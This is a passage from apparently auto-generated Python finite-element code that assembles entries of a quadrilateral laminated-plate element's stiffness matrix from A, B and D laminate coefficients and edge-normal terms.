k0[i1*dof+1, i2*dof+4] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+1, i3*dof+0] += Ac*((A12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+1, i3*dof+1] += Ac*((A22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+1, i3*dof+3] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+1, i3*dof+4] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+1, i4*dof+0] += Ac*((A12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+1, i4*dof+1] += Ac*((A22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + A66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+1, i4*dof+3] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+1, i4*dof+4] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+3, i1*dof+0] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+3, i1*dof+1] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+3, i1*dof+3] += Ac*((D11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+3, i1*dof+4] += Ac*((D12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+3, i2*dof+0] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+3, i2*dof+1] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+3, i2*dof+3] += Ac*((D11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+3, i2*dof+4] += Ac*((D12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+3, i3*dof+0] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+3, i3*dof+1] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+3, i3*dof+3] += Ac*((D11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+3, i3*dof+4] += Ac*((D12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+3, i4*dof+0] += Ac*((B11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+3, i4*dof+1] += Ac*((B12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + B66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+3, i4*dof+3] += Ac*((D11*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D16*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+3, i4*dof+4] += Ac*((D12*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + D66*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+4, i1*dof+0] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+4, i1*dof+1] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+4, i1*dof+3] += Ac*((D12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i1*dof+4, i1*dof+4] += Ac*((D22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i1*dof+4, i2*dof+0] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+4, i2*dof+1] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+4, i2*dof+3] += Ac*((D12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i1*dof+4, i2*dof+4] += Ac*((D22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i1*dof+4, i3*dof+0] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+4, i3*dof+1] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+4, i3*dof+3] += Ac*((D12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i1*dof+4, i3*dof+4] += Ac*((D22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i1*dof+4, i4*dof+0] += Ac*((B12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+4, i4*dof+1] += Ac*((B22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + B66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i1*dof+4, i4*dof+3] += Ac*((D12*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D16*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i1*dof+4, i4*dof+4] += Ac*((D22*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D26*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D26*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + D66*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+0, i1*dof+0] += Ac*((A11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+0, i1*dof+1] += Ac*((A12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + A66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+0, i1*dof+3] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
